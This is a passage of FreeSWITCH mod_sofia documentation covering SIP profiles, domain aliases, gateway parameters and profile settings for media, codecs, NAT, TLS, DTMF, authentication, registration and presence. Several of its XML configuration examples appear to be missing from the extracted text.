don\u0026rsquo;t need to use a STUN server. In order to accommodate these requirements, I\u0026rsquo;ve created two different UAs. One of them uses a STUN server and for that matter also connects up to the PSTN through a service provider. The other UA is purely for local SIP calls. Now I\u0026rsquo;ve got two UAs defined by my profiles, each of which can handle a call. When dialing a SIP address or telephone number, which UA is used? 
That determination is made in the dialplan. One syntax for making a call via Sofia in the dialplan is sofia/profile_name/destination\nSo, the task becomes rather straightforward. Dialplans use pattern matching and other tricks to determine how to handle a call. My dialplan examines what I\u0026rsquo;ve dialed and then determines what profile to use with that call. If I dial a telephone number, the dialplan selects the UA that connects up to the PSTN. If I dial a SIP address outside the firewall, the dialplan selects that same UA because it uses the STUN server. But if I dial a SIP address that\u0026rsquo;s inside the firewall, the dialplan selects the \u0026ldquo;local\u0026rdquo; UA. To understand how to write dialplans, use pattern matching, etc., see Dialplan\nThe Relationship Between SIP Profiles and Domains The following content was written in a mailing list thread by Anthony Minessale in response to questions about how SIP profiles relate to domain names in FreeSWITCH. The best thing to do is take a look at these things from a step back. The domains inside the XML registry are completely different from the domains on the internet and again completely different from domains in sip packets. The profiles are again entirely different from any of the above. It\u0026rsquo;s up to you to align them if you so choose. The default configuration distributed with FreeSWITCH sets up the scenario most likely to load on any machine and work out of the box. That is the primary goal of that configuration, so it sets the domain in both the directory, the global default domain variable and the name of the internal profile to be identical to the IP addr on the box that can reach the internet. Then it sets the sip to force everything to that value. When you want to detach from this behavior, you are probably on a venture to do some kind of multi-home setup. Aliases in the tag are a list of keys you want to use that lead to the current profile you are configuring. 
Think of it as the /etc/hosts file in Unix, only for profiles. When you define aliases to match all of the possible domains hosted on a particular profile, then when you try to take a user@host.com notation and decide which profile it came from, you can use the aliases to find it providing you have added to that profile. The tag is an indicator telling the profile to open the XML registry in FreeSWITCH and run through any domains defined therein. The 2 key attributes are: alias: [true/false] (automatically create an alias for this domain as mentioned above) parse: [true/false] (scan the domain for gateway entries and include them into this profile) name: [] (either the name of a specific domain or \u0026lsquo;all\u0026rsquo; to denote parsing every domain in the directory)\nAs you showed in your question the default config has If you apply what you have learned above, it will scan for every domain (there is only one by default) and add an alias for it and not parse it for gateways. The default directory uses global config vars to set the domain to match the local IP addr on the box. So now you will have a domain in your config that is your IP addr, and the internal profile will attach to it and add an alias so that value expands to match it. This is explained in a comment at the top of directory/default.xml: FreeSWITCH works off the concept of users and domains just like email. You have users that are in domains for example 1000@domain.com.\nWhen freeswitch gets a register packet it looks for the user in the directory based on the from or to domain in the packet depending on how your sofia profile is configured. Out of the box the default domain will be the IP address of the machine running FreeSWITCH. This IP can be found by typing \u0026ldquo;sofia status\u0026rdquo; at the CLI. You will register your phones to the IP and not the hostname by default. 
If you wish to register using the domain please open vars.xml in the root conf directory and set the default domain to the hostname you desire. Then you would use the domain name in the client instead of the IP address to register with FreeSWITCH.\nSo having more than one profile with the default of is going to end up aliasing the same domains into all profiles who call it and cause an overwrite in the lookup table and probably an error in your logs somewhere. If you had parse=\u0026ldquo;true\u0026rdquo; on all of them, they would all try and register to the gateways in all of your domains. If you look at the stock config, external.xml is a good example of a secondary profile, it has so no aliases, and yes parse \u0026hellip; the exact opposite of the internal so that all the gateways would register from external and internal would bind to the local IP addr. So, you probably want to use separate per domain per profile you want to bind it to in more complicated setups.\nStructure of a Profile Each profile may contain several different subsections. At the present time there\u0026rsquo;s no XSD or DTD for sofia.conf.xml — and any volunteer who can create one would be very welcome indeed.\nGateway Each profile can have several gateways: elements\u0026hellip; elements\u0026hellip; A gateway has an attribute \u0026ldquo;name\u0026rdquo; by which it can be referred. A gateway describes how to use a different UA to reach destinations. For example, the gateway may provide access to the PSTN, or to a private SIP network. The reason for defining a gateway, presumably, is because the gateway requires certain information before it will accept a call from the FreeSWITCH User Agent. Variables can be defined on a gateway. Inbound variables are set on the channel of a call received from a gateway, outbound variables are set on the channel of a call sent to a gateway. 
An example gateway configuration would be: To reach a particular gateway from the dial plan, use sofia/gateway/\u0026lt;gateway_name\u0026gt;/\nFreeSWITCH can also subscribe to receive notification of events from the gateway. For more information see Presence - Use FreeSWITCH as a Client\nParameters The following is a list of param elements that are children of a gateway element:\nNote: The username param for the gateway is not to be confused with the username param in the Profile settings config!\nNote: the extension parameter influences the contents of the channel variables Caller-Destination-Number and destination_number. If it is blank, Caller-Destination-Number will always be set to the gateway\u0026rsquo;s username. If it has a value, Caller-Destination-Number will always be set to this value. If it has the value auto_to_user, Caller-Destination-Number will be populated with the value ${sip_to_user}, which means the real dialled number in case of an inbound call.\nping-min means \u0026ldquo;how many successful pings we must have before declaring a gateway up\u0026rdquo;. The interval between ping-min and ping-max is the \u0026ldquo;safe area\u0026rdquo; where a gateway is marked as UP. So if we have, for example, min 3 and max 6, if the gateway is up and we move the counter between 3,4,5,6 the gateway will be up. If from 6 we lose 4 (so counter == 2) pings in a row, the gateway will be declared down. Please note that on sofia startup the gateway is always started as UP, so it will be up even if ping-min is \u0026gt; 1. The \u0026ldquo;right\u0026rdquo; way starts when the gateway goes down.\nParam \u0026ldquo;register,\u0026rdquo; is used when this profile acts as a client to another UA. By registering, FreeSWITCH informs the other UA of its whereabouts. This is generally used when FreeSWITCH wants the other UA to send FreeSWITCH calls, and the other UA expects this sort of registration. 
If FreeSWITCH uses the other UA only as a gateway (e.g., to the PSTN), then registration is not generally required. Param \u0026ldquo;distinct-to\u0026rdquo; is used when you want FS to register using a distinct AOR for the To header. It requires proper setting of related parameters. For example if you want the REGISTER to go with: From: sip:someuser@somedomain.com To: sip:anotheruser@anotherdomain.com\nThen set the parameters like this: The latter param, \u0026ldquo;ping\u0026rdquo; is used to check gateway availability. By setting this option, FreeSWITCH will send SIP OPTIONS packets to the gateway. If the gateway responds with 200 or 404, the gateway is pronounced up, otherwise down. [N.B. It appears that other error messages can be returned and still result in the gateway being marked as \u0026lsquo;up\u0026rsquo;?] If any call is routed to a gateway with state down, FreeSWITCH will generate a NETWORK_OUT_OF_ORDER hangup cause. Ping frequency is defined in seconds (value attribute) and has a minimum value of 5 seconds. Param \u0026ldquo;extension-in-contact\u0026rdquo; is used to force what the contact info will be in the registration. If you are having a problem with the default registering as gw+gateway_name@ip you can set this to true to use extension@ip. If extension is blank, it will use username@ip.\nIf you need to insert the FROM digits to the Contact URI User Part when sending a call to the gateway BEFORE From: \u0026ldquo;8885551212\u0026rdquo; sip:88855512120@8.8.8.8 Contact: sip:gw+mygateway@7.7.7.7:7080 try adding these to the gateway params\nThese channel variables will be set on all calls going through this gateway in the specified direction. However, see below for a special syntax to set profile variables rather than channel variables. Settings Settings include other, more general information about the profile, including whether or not STUN is in use. Each profile has its own settings element. 
Not only is this convenient — it\u0026rsquo;s possible to set up one profile to use STUN and another, with a different gateway or working behind the firewall, not needing STUN — but it\u0026rsquo;s also crucial. That\u0026rsquo;s because each profile defines a SIP User Agent, and each UA must have its own unique \u0026ldquo;sip-port.\u0026rdquo; By convention, 5060 is the default port, but it\u0026rsquo;s possible to make calls to, e.g., \u0026ldquo;foo@sip.example.com:5070\u0026rdquo;, and therefore you can define any port you please for each individual profile. The conf directory contains a complete sample sofia.conf.xml file, along with comments. See Git examples: Internal, External\nBasic settings alias This seems to make the SIP profile bind to this IP \u0026amp; port as well as your SIP / RTP IPs and ports. Anthony had this to say about aliases in a ML thread: Aliases in the tag are a list of keys you want to use that lead to the current profile you are configuring. Think of it as the /etc/hosts file in Unix, only for profiles. When you define aliases to match all of the possible domains hosted on a particular profile, then when you try to take a user@host.com notation and decide which profile it came from, you can use the aliases to find it providing you have added to that profile.\nshutdown-on-fail If set to true and the profile fails to load, FreeSWITCH will shut down. This is useful if you are running something like Pacemaker and OpenAIS which manage a pair of FreeSWITCH nodes and automatically monitor, start, stop, restart, and standby-on-fail the nodes. It will ensure that the specific node is not able to be used in a \u0026ldquo;partially up\u0026rdquo; situation.\nuser-agent-string This sets the User-Agent header in all SIP messages sent by your server. By default this could be something like \u0026ldquo;FreeSWITCH-mod_sofia/1.0.trunk-12805\u0026rdquo;. 
If you didn\u0026rsquo;t want to advertise detailed version information you could simply set this to \u0026ldquo;FreeSWITCH\u0026rdquo; or even \u0026ldquo;Asterisk PBX\u0026rdquo; as a joke. Take care when setting this value as certain characters such as \u0026lsquo;@\u0026rsquo; could cause other SIP proxies to reject your messages as invalid.\nlog-level sip-trace context Dialplan context in which to dump calls that come in to this profile\u0026rsquo;s ip:port\nsip-port Port to bind to for SIP traffic:\nsip-ip IP address to bind to for SIP traffic. DO NOT USE HOSTNAMES, ONLY IP ADDRESSES\nrtp-ip IP address to bind to for RTP traffic. DO NOT USE HOSTNAMES, ONLY IP ADDRESSES Multiple rtp-ip support: if more rtp-ip parameters are added, they will be used in round-robin as new calls progress. IPv6 addresses are not supported under Windows at the time of writing. See FS-4445 ext-rtp-ip This is the IP behind which FreeSWITCH is seen from the Internet, so if FreeSWITCH is behind NAT, this is basically the public IP that should be used for RTP. Possible values are: Any variable from vars.xml, e.g. $${external_rtp_ip}:\n\u0026ldquo;specific IP address\u0026rdquo;\n\u0026ldquo;when used for LAN and WAN to avoid errors in the SIP CONTACT sent to LAN devices, use\u0026rdquo;\n\u0026ldquo;auto\u0026rdquo;: the guessed IP will be used (guessed by looking in the IP routing table which interface is the default route)\n\u0026ldquo;auto-nat\u0026rdquo;: FreeSWITCH will use uPNP or NAT-PMP to discover the public IP address it should use\n\u0026ldquo;stun:DNS name or IP address\u0026rdquo;: FreeSWITCH will use the STUN server of your choice to discover the public IP address\n\u0026ldquo;host:DNS name\u0026rdquo;: FreeSWITCH will resolve the DNS name as the public IP address, so you can use a dynamic DNS host\nATTENTION: AS OF 2012Q4, \u0026rsquo;ext–\u0026rsquo; prefixed params cited above when populated with to-be-resolved DNS strings \u0026ndash; e.g. 
name=\u0026ldquo;ext–sip–ip\u0026rdquo; value=\u0026ldquo;stun:stun.freeswitch.org\u0026rdquo; or name=\u0026ldquo;ext‑rtp–ip\u0026rdquo; value=\u0026ldquo;host:mypublicIP.dyndns.org\u0026rdquo; \u0026ndash; are resolved to IP addresses once only at FS load time and const thereafter. FS is blind to (unaware of) any subsequent changes in your environment\u0026rsquo;s IP address. Thus, these ext– vars may become functionally incompatible with the environment\u0026rsquo;s current IP addresses with unspecified results in call flow at the network layer. FS restart is required for FS to capture the now-current, working IP address(es).\next-sip-ip This is the IP behind which FreeSWITCH is seen from the Internet, so if FreeSWITCH is behind NAT, this is basically the public IP that should be used for SIP. Possible values are the same as those for ext-rtp-ip, and it is usually set to the same value.\ntcp-keepalive Set this to the interval (in milliseconds) to send keep alive packets to user agents (UAs) registered via TCP; do not set to disable.\ntcp-pingpong tcp-ping2pong dialplan The dialplan parameter is very powerful. In the simplest configuration, it will use the XML dialplan. This means that it will read data from mod_xml_curl XML dialplans (e.g., callback to your webserver), or failing that, from the XML files specified in the freeswitch.xml dialplan section. (e.g. 
default_context.xml)\nYou can also add enum lookups into the picture (since mod_enum provides dialplan functionality), so enum lookups override the XML dialplan\nOr reverse the order so enum is only consulted if the XML lookup fails\nIt is also possible to specify a specific enum root\nOr use XML on a custom file\nWhere it will first check the specific XML file, then hit normal XML which also does a mod_xml_curl lookup assuming you have that configured and working.\nMedia related options See also: Proxy Media\nresume-media-on-hold When calls are in no media this will bring them back to media when you press the hold button. To return the calls to bypass-media after the call is unheld, enable bypass-media-after-hold.\nbypass-media-after-att-xfer This will allow a call to go back to bypass media after an attended transfer. bypass-media-after-hold This will allow a call to go back to bypass media after a hold. This option can be enabled only if resume-media-on-hold is set. Available from git rev 8fa385b. inbound-bypass-media Uncomment to set all inbound calls to no media mode. It means that the FreeSWITCH server only keeps the SIP messages state, but has the RTP stream go directly from end-point to end-point\ninbound-proxy-media Uncomment to set all inbound calls to proxy media mode. This means the FreeSWITCH keeps both the SIP and RTP traffic on the server but does not interact with the RTP stream.\ndisable-rtp-auto-adjust ignore-183nosdp enable-soa Set the value to \u0026ldquo;false\u0026rdquo; to disable SIP SOA from sofia to tell sofia not to touch the exchange of SDP\nt38-passthru The following options are available\n\u0026rsquo;true\u0026rsquo; enables t38 passthru \u0026lsquo;false\u0026rsquo; disables t38 passthru \u0026lsquo;once\u0026rsquo; enables t38 passthru, but sends t.38 re-invite only once (available since commit 08b25a8 from Nov. 
9, 2011) Codecs related options Also see:\nCodec Negotiation Supported Codecs inbound-codec-prefs This parameter allows you to change the allowed inbound codecs per profile. outbound-codec-prefs This parameter allows you to change the outbound codecs per profile. codec-prefs This parameter allows you to change both inbound-codec-prefs and outbound-codec-prefs at the same time. inbound-codec-negotiation set to \u0026lsquo;greedy\u0026rsquo; if you want your codec list to take precedence. If \u0026lsquo;greedy\u0026rsquo; doesn\u0026rsquo;t work for you, try \u0026lsquo;scrooge\u0026rsquo; which has been known to fix misreported ptime issues with DID providers such as CallCentric. A rule of thumb is:\n\u0026lsquo;generous\u0026rsquo; permits the remote codec list to have precedence and \u0026lsquo;win\u0026rsquo; the codec negotiation and selection process \u0026lsquo;greedy\u0026rsquo; forces a win by the local FreeSWITCH preference list \u0026lsquo;scrooge\u0026rsquo; takes \u0026lsquo;greedy\u0026rsquo; a step further, so that FreeSWITCH wins even when the far side lies about capabilities during the negotiation process sip_codec_negotiation is a channel variable version of this setting\ninbound-late-negotiation Uncomment to let calls hit the dialplan before you decide if the codec is OK. bitpacking This setting is for AAL2 bitpacking on G.726. disable-transcoding Uncomment if you want to force the outbound leg of a bridge to only offer the codec that the originator is using\nrenegotiate-codec-on-reinvite STUN If you need to use a STUN server, here are common working examples:\next-rtp-ip stun.fwdnet.net is a publicly-accessible STUN server.\next-sip-ip stun-enabled Simple traversal of UDP over NATs (STUN), is used to help resolve the problems associated with SIP clients, behind NAT, using private IP address space in their messaging. 
Use stun when specified (default is true).\nstun-auto-disable Set to true to have the profile determine stun is not useful and turn it off globally\nNATing apply-nat-acl When receiving a REGISTER or INVITE, enable NAT mode automatically if IP address in Contact header matches an entry defined in the RFC 1918 access list. \u0026ldquo;acl\u0026rdquo; is a misnomer in this case because access will not be denied if the user\u0026rsquo;s contact IP doesn\u0026rsquo;t match.\naggressive-nat-detection This will enable NAT mode if the network IP/port from which the request was received differs from the IP/Port combination in the SIP Via: header, or if the Via: header contains the received parameter (regardless of what it contains.) Note 2009-04-05: Someone please clarify when this would be useful. It seems to me if someone needed this feature, chances are that things are so broken that they would need to use NDLB-force-rport\nVAD and CNG VAD stands for Voice Activity Detector. FreeSWITCH is capable of detecting speech and can stop transmitting RTP packets when no voice is detected.\nvad suppress-cng Suppress Comfort Noise Generator (CNG) on this profile or per call with the \u0026lsquo;suppress_cng\u0026rsquo; variable\nNDLB (A.K.A. No device left behind) NDLB-force-rport This will force FreeSWITCH to send SIP responses to the network port from which they were received. Use at your own risk! For more information see NAT Traversal.\nsafe = param that does force-rport behavior only on endpoints we know are safe to do so on. 
This is a dirty hack to try to work with certain endpoints behind a SonicWall which does not use the same port when it does NAT, when the devices do not support rport, while not breaking devices that actually use different ports that force-rport will break NDLB-broken-auth-hash Used for when phones respond to a challenged ACK with method INVITE in the hash\nNDLB-received-in-nat-reg-contact add a ;received=\u0026quot;:\u0026quot; to the contact when replying to register for nat handling\nNDLB-sendrecv-in-session By default, \u0026ldquo;a=sendrecv\u0026rdquo; is only included in the media portion of the SDP. While this is RFC-compliant, it may break functionality for some SIP devices. To also include \u0026ldquo;a=sendrecv\u0026rdquo; in the session portion of the SDP, set this parameter to true.\nNDLB-allow-bad-iananame Introduced in rev. 15401, this was enabled by default prior to the new param. Will allow codecs to match the respective name even if the given string is not correct. i.e., Linksys and Sipura phones will pass G.729a by default instead of G.729 as codec string therefore not matching. If you wish to allow bad IANA names to match the respective codec string, add the following param to your SIP profile. Refer to RFC 3551, RFC 3555 and the IANA list(s) for SDP\nCall ID inbound-use-callid-as-uuid On inbound calls make the uuid of the session equal to the SIP call id of that call.\noutbound-use-uuid-as-callid On outbound calls set the callid to match the uuid of the session\nThis goes in the \u0026ldquo;..sip_profiles/external.xml\u0026rdquo; file.\nTLS Please make sure to read SIP TLS before enabling certain features below as they may not behave as expected.\ntls TLS: disabled by default, set to \u0026ldquo;true\u0026rdquo; to enable tls-only disabled by default, when enabled prevents sofia from listening on the unencrypted port for this connection. 
This can stop many generic brute force scripts and if all your clients connect over TLS then it can help decrease the exposure of your FreeSWITCH server to the world. tls-bind-params additional bind parameters for TLS tls-sip-port Port to listen on for TLS requests. (5061 will be used if unspecified) tls-cert-dir Location of the agent.pem and cafile.pem ssl certificates (needed for TLS server) tls-version TLS version (\u0026ldquo;sslv2\u0026rdquo;, \u0026ldquo;sslv3\u0026rdquo;, \u0026ldquo;sslv23\u0026rdquo;, \u0026ldquo;tlsv1\u0026rdquo;, \u0026ldquo;tlsv1.1\u0026rdquo;, \u0026ldquo;tlsv1.2\u0026rdquo;). NOTE: Phones may not work with TLSv1 When not set defaults to: \u0026ldquo;tlsv1,tlsv1.1,tlsv1.2\u0026rdquo;\ntls-passphrase If your agent.pem is protected by a passphrase stick the passphrase here to enable FreeSWITCH to decrypt the key. tls-verify-date If the client/server certificate should have the date on it validated to ensure it is not expired and is currently active. tls-verify-policy This controls what, if any, security checks are done against server/client certificates. Verification is generally checking that certificates are valid against the cafile.pem. Set to \u0026lsquo;in\u0026rsquo; to only verify incoming connections, \u0026lsquo;out\u0026rsquo; to only verify outgoing connections, \u0026lsquo;all\u0026rsquo; to verify all connections, also \u0026lsquo;subjects_in\u0026rsquo;, \u0026lsquo;subjects_out\u0026rsquo; and \u0026lsquo;subjects_all\u0026rsquo; for subject validation (subject validation for outgoing connections is against the hostname/ip being connected to). Multiple policies can be split with a \u0026lsquo;|\u0026rsquo; pipe, for example \u0026lsquo;subjects_in|subjects_out\u0026rsquo;. Defaults to none. tls-verify-depth When certificate validation is enabled (tls-verify-policy) how deep should we try to verify a certificate up the chain against the cafile.pem file. By default only a depth of 2. 
tls-verify-in-subjects If subject validation is enabled for incoming connections (tls-verify-policy set to \u0026lsquo;subjects_in\u0026rsquo; or \u0026lsquo;subjects_all\u0026rsquo;) this is the list of subjects that are allowed (delimit with a \u0026lsquo;|\u0026rsquo; pipe); note this only affects incoming connections, for outgoing connections subjects are always checked against hostnames/ips. DTMF rfc2833-pt TODO RFC 2833 is obsoleted by RFC 4733.\ndtmf-duration dtmf-type TODO RFC 2833 is obsoleted by RFC 4733. Set the parameter in the SIP profile:\nor\nor\nOR set the variable in the SIP gateway or user profile (NOT in the channel, it must be before CS_INIT): Note the \u0026ldquo;_\u0026rdquo; instead of \u0026ldquo;-\u0026rdquo; in the profile param (this is a var set in the dialplan). (24.10.2010: \u0026ldquo;both\u0026rdquo; doesn\u0026rsquo;t seem to work in my tests, \u0026ldquo;outbound\u0026rdquo; does) Note: for inband DTMF, Misc. Dialplan Tools start_dtmf must be used in the dialplan. Also, to change the outgoing routing from info or rfc2833 to inband, use Misc._Dialplan_Tools_start_dtmf_generate RFC 2833\npass-rfc2833 TODO RFC 2833 is obsoleted by RFC 4733. Default: false If true, it passes RFC 2833 DTMF\u0026rsquo;s from one side of a bridge to the other, untouched. Otherwise, it decodes and re-encodes them before passing them on.\nliberal-dtmf TODO RFC 2833 is obsoleted by RFC 4733. Default: false For DTMF negotiation, use this parameter to just always offer 2833 and accept both 2833 and INFO. 
Use of this parameter is not recommended since its purpose is to try to cope with buggy SIP implementations.\nSIP Related options enable-timer This enables or disables support for RFC 4028 SIP Session Timers.\nNote: If your switch requires the timer option; for instance, Huawei SoftX3000, it needs this optional field and drops the calls with \u0026ldquo;Session Timer Check Message Failed\u0026rdquo;, then you may be able to revert the commit that took away the Require: timer option which is an optional field by: git log -1 -p 58c3c3a049991fedd39f62008f8eb8fca047e7c5 libs/sofia-sip/libsofia-sip-ua | patch -p1 -R touch libs/sofia-sip/.update\nmake mod_sofia-clean make mod_sofia-install\nenable-100rel This enables support for 100rel (100% reliability - PRACK message as defined in RFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission. 2009-07-08: Enabling this may cause FreeSWITCH to crash, see FSCORE-392.\nminimum-session-expires This sets the \u0026ldquo;Min-SE\u0026rdquo; value (in seconds) from RFC 4028. This value must not be less than 90 seconds.\nsip-options-respond-503-on-busy When set to true, this param will make FreeSWITCH respond to incoming SIP OPTIONS with 503 \u0026ldquo;Maximum Calls In Progress\u0026rdquo; when FS is paused or the maximum number of sessions has been exceeded. When set to false or when not set at all (default behavior), SIP OPTIONS are always responded to with 200 \u0026ldquo;OK\u0026rdquo;.\nSetting this param to true is especially useful if you\u0026rsquo;re using a proxy such as OpenSIPS or Kamailio with the dispatcher module to probe your FreeSWITCH servers by sending SIP OPTIONS.\nsip-force-expires Setting this param overrides the expires value in the 200 OK in response to all inbound SIP REGISTERs towards this sip_profile. 
This param can be overridden per individual user by setting a sip-force-expires user directory variable.\nsip-expires-max-deviation Setting this param adds a random deviation to the expires value in the 200 OK in response to all inbound SIP REGISTERs towards this sip_profile. The result is that clients will not all re-register at the same interval, thus spreading the load on your system. For example, if you set sip-force-expires to 1800 and sip-expires-max-deviation to 600, then the expires value in the response will be between 1800-600=1200 and 1800+600=2400 seconds. This param can be overridden per individual user by setting a sip-expires-max-deviation user directory variable.\noutbound-proxy Setting this param will send all outbound transactions to the value set by outbound-proxy. send-display-update Tells FreeSWITCH not to send display UPDATEs to the leg of the call. RTP Related options auto-jitterbuffer-msec Set this to the size of the jitterbuffer you would like to have on all calls coming through this profile.\nrtp-timer-name rtp-rewrite-timestamps If you don\u0026rsquo;t want to pass through timestamps from one RTP stream to another, rtp-rewrite-timestamps is a parameter you can set in a SIP Profile (on a per-call basis with the rtp_rewrite_timestamps chanvar in a dialplan). The result is that FreeSWITCH will regenerate and rewrite the timestamps in all the RTP streams going to an endpoint using this SIP Profile. This could be necessary to fix audio issues when sending calls to some paranoid and not RFC-compliant gateways (Cirpack is known to require this).\nmedia_timeout was: rtp-timeout-sec (deprecated) The number of seconds of RTP inactivity (media silence) before FreeSWITCH considers the call disconnected, and hangs up. It is recommended that you use session timers instead. 
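As a sketch, the timeout just described could be set as a profile param like this (the 30-second value is illustrative, assuming the value is in seconds as described above):

```xml
<!-- Hang up after 30 seconds of RTP inactivity (illustrative value) -->
<param name="media_timeout" value="30"/>
```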
If this setting is omitted, the default value is \u0026ldquo;0\u0026rdquo;, which disables the timeout.\nmedia_hold_timeout was: rtp-hold-timeout-sec (deprecated) The number of seconds of RTP inactivity (media silence) for a call placed on hold by an endpoint before FreeSWITCH considers the call disconnected, and hangs up. It is recommended that you use session timers instead. If this setting is omitted, the default value is \u0026ldquo;0\u0026rdquo;, which disables the timeout.\nrtp-autoflush-during-bridge Controls what happens if FreeSWITCH detects that it\u0026rsquo;s not keeping up with the RTP media (audio) stream on a bridged call. (This situation can happen if the FreeSWITCH server has insufficient CPU time available.) When set to \u0026ldquo;true\u0026rdquo; (the default), FreeSWITCH will notice when more than one RTP packet is waiting to be read in the incoming queue. If this condition persists for more than five seconds, RTP packets will be discarded to \u0026ldquo;catch up\u0026rdquo; with the audio stream. For example, if there are always five extra 20 ms packets in the queue, 100 ms of audio latency can be eliminated by discarding the packets. This will cause an audio glitch as some audio is discarded, but will improve the latency by 100 ms for the rest of the call. If rtp-autoflush-during-bridge is set to false, FreeSWITCH will instead preserve all RTP packets on bridged calls, even if it increases the latency or \u0026ldquo;lag\u0026rdquo; that callers hear.\nrtp-autoflush Has the same effect as \u0026ldquo;rtp-autoflush-during-bridge\u0026rdquo;, but affects NON-bridged calls (such as faxes, IVRs and the echo test). Unlike \u0026ldquo;rtp-autoflush-during-bridge\u0026rdquo;, the default is false, meaning that high-latency packets on non-bridged calls will not be discarded. This results in smoother audio at the possible expense of increasing audio latency (or \u0026ldquo;lag\u0026rdquo;). 
Setting \u0026ldquo;rtp-autoflush\u0026rdquo; to true will discard packets to minimize latency when possible. Doing so may cause errors in DTMF recognition, faxes, and other processes that rely on receiving all packets.\nAuth These settings deal with authentication: requirements for identifying SIP endpoints to FreeSWITCH.\nchallenge-realm Choose the realm challenge key. Default is auto_to if not set. auto_from - uses the from field as the value for the SIP realm. auto_to - uses the to field as the value for the SIP realm. - you can input any value to use for the SIP realm. If you want URL dialing to work you\u0026rsquo;ll want to set this to auto_from. If you use any other value besides auto_to or auto_from you\u0026rsquo;ll lose the ability to do multiple domains. Note: comment out to restore the behavior before 2008-09-29\naccept-blind-auth accept any authentication without actually checking (not a good feature for most people)\nauth-calls Users in the directory can have \u0026ldquo;auth-acl\u0026rdquo; parameters applied to them so as to restrict users\u0026rsquo; access to a predefined ACL or a CIDR.\nValue can be \u0026ldquo;false\u0026rdquo; to disable authentication on this profile, meaning that when calls come in the profile will not send an auth challenge to the caller.\nlog-auth-failures Write log entries (Warning) on authentication failures (Registration \u0026amp; Invite). Useful for users wishing to use fail2ban. Note: requires SVN #15654 or higher\nauth-all-packets On authed calls, authenticate all the packets instead of only INVITE and REGISTER (Note: OPTIONS, SUBSCRIBE, INFO and MESSAGE are not authenticated even with this option set to true, see http://jira.freeswitch.org/browse/FS-2871)\nRegistration disable-register disables registration, which may be undesirable in a public switch\nmultiple-registrations Valid values for this parameter are \u0026ldquo;contact\u0026rdquo;, \u0026ldquo;true\u0026rdquo;, \u0026ldquo;false\u0026rdquo;. 
value=\u0026ldquo;true\u0026rdquo; is the most common use. Setting this value to \u0026ldquo;contact\u0026rdquo; will remove the old registration based on the sip_user, sip_host and contact fields as opposed to the call_id.\nmax-registrations-per-extension Defines the maximum number of registrations per extension. The valid value for this parameter is an integer greater than 0. Please note that setting this to 1 would counteract the usage of multiple-registrations. When an attempt to register an extension is made after the maximum value has been reached, Sofia will respond with 403. The following example will set maximum registrations to 2:\n\u0026lt;param name=\u0026#34;max-registrations-per-extension\u0026#34; value=\u0026#34;2\u0026#34;/\u0026gt;\ninbound-reg-force-matching-username Force the user and auth-user to match.\nforce-publish-expires Force custom presence update expires delta (-1 means endless)\nforce-register-domain all inbound registrations will look in this domain for the users. Comment out to use multiple domains\nforce-register-db-domain all inbound registrations will be stored in the db using this domain. Comment out to use multiple domains\nsend-message-query-on-register Can be set to \u0026lsquo;true\u0026rsquo;, \u0026lsquo;false\u0026rsquo; or \u0026lsquo;first-only\u0026rsquo;. If set to \u0026lsquo;true\u0026rsquo; (this is the default behavior), mod_sofia will send a message-query event upon registration. mod_voicemail uses this for counting messages.\nIf set to \u0026lsquo;first-only\u0026rsquo;, only the first REGISTER will trigger the message-query (it requires the UA to increment the NC on subsequent REGISTERs. Some phones, snom for instance, do not do this). 
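As a sketch, the first-only behavior described above would be configured as a profile param like this:

```xml
<!-- Trigger the message-query only on the first REGISTER -->
<param name="send-message-query-on-register" value="first-only"/>
```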
The final effect of the message-query is to cause a NOTIFY MWI message to be sent to the registering UA (it is used to satisfy terminals that expect MWI without subscribing for it).\nunregister-on-options-fail If set to True together with nat-options-ping, the endpoint will be unregistered if there is no answer to the OPTIONS packet.\nnat-options-ping With this option set, FreeSWITCH will periodically send an OPTIONS packet to all NATed registered endpoints to keep the connection alive. If set to True together with unregister-on-options-fail, the endpoint will be unregistered if there is no answer to the OPTIONS packet.\nall-reg-options-ping With this option set, FreeSWITCH will periodically send an OPTIONS packet to all registered endpoints to keep the connection alive. If set to True together with unregister-on-options-fail, the endpoint will be unregistered if there is no answer to the OPTIONS packet.\nregistration-thread-frequency Controls how often registrations in FreeSWITCH are checked for expiration. ping-mean-interval Controls the mean interval at which FreeSWITCH™ sends OPTIONS packets to registered users; 30 seconds by default.\nSubscription force-subscription-expires forces the subscription expires to a lower value than requested\nforce-subscription-domain all inbound subscriptions will look in this domain for the users. Comment out to use multiple domains\nPresence manage-presence Enable presence. If you want to share your presence (see dbname and presence-hosts) set this to \u0026ldquo;true\u0026rdquo; on the first profile and enable the shared presence database. Then on subsequent profiles that share presence set this variable to \u0026ldquo;passive\u0026rdquo; and enable the shared presence database there as well.\ndbname Used to share presence info across sofia profiles. Name of the db to use for this profile\npresence-hold-state By default when a call is placed on hold, monitoring extensions show that extension as ringing. You can change this behavior by specifying this parameter and one of the following values. 
Available as of commit 1145905 on April 13, 2012.\nconfirmed - Extension appears busy. early (default) - Extension appears to be ringing. terminated - Extension appears idle. presence-hosts A list of domains that have a shared presence in the database specified in dbname. People who use multiple domains per profile can\u0026rsquo;t use this feature anyway, so you\u0026rsquo;ll want to set it to something like \u0026ldquo;DISABLED\u0026rdquo; in this case to avoid getting users from similar domains all mashed together. For multiple domains (also known as multi-tenant), calling 1001 would call all matching users in all domains. Don\u0026rsquo;t use presence-hosts with multi-tenant.\npresence-privacy Optionally globally hide the caller ID from presence notes in distributed NOTIFY messages. For example, \u0026ldquo;Talk 1002\u0026rdquo; would be the presence note for extension 1001 while it is on a call with extension 1002. If the presence privacy tag is set to true, then it would distribute the presence note as \u0026ldquo;On The Phone\u0026rdquo; (without the extension to which it is connected). So any subscribers to 1001\u0026rsquo;s presence would not be able to see who he/she is talking to. http://jira.freeswitch.org/browse/FS-849 This also hides the number in the status \u0026ldquo;hold\u0026rdquo;, \u0026ldquo;ring\u0026rdquo;, \u0026ldquo;call\u0026rdquo; and perhaps others. http://jira.freeswitch.org/browse/FS-4420\nsend-presence-on-register Specify whether or not to send presence information when users register. Default is not to send presence information. 
